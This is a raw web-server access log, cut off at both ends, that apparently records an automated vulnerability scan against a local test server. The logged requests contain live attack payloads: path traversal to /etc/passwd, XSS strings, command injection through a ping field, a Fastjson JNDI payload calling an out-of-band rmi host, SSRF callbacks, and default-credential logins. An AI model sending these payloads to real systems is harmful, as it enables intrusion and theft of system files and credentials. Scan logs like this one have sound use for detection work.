/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stats/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crx/de/index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /html/repository HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.ppk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cas/v1/tickets/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"@c9v8gc8smpv8b0ng0t00h9x5wzoaphp9n.oast.online","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.024","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"html_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?c=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=C:\x5CWindows\x5Csystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/config/1.0/directory HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../..//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmodule-ee/login.seam HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/affwp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/known_hosts.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"@\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_bulk HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET http://c9v8gc8smpv8b0ng0t00fyfuq8f6xahaf.oast.online/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.028","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"password=12345","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/custom.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0acat+%2Fetc%2Fpasswd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/login_pic.asp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"{\x0D\x0A \x22a\x22:{\x0D\x0A \x22@type\x22:\x22java.lang.Class\x22,\x0D\x0A \x22val\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22\x0D\x0A },\x0D\x0A \x22b\x22:{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8gc8smpv8b0ng0t00qjx7y1gnigme8.oast.online/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /showfile.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/shell/sitecore.version.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"username=root&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/luci/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/auth/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MFmX93yZDq6kWwQWuue5h6h6 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"::1"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/oembed/1.0/proxy?url=http://c9v8gc8smpv8b0ng0t00zai7mm8ja7d93.oast.online/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET @c9v8gc8smpv8b0ng0t00ipp9euawcjf6a.oast.online/ HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/database/selector/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /thruk/cgi-bin/login.cgi?thruk/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/dump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json/v1.0/297MFk7aVHAUucM7NePEVlmDxyx@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:54 +0000","request_body":"html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0atype+C%3A%5CWindows%5Cwin.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", 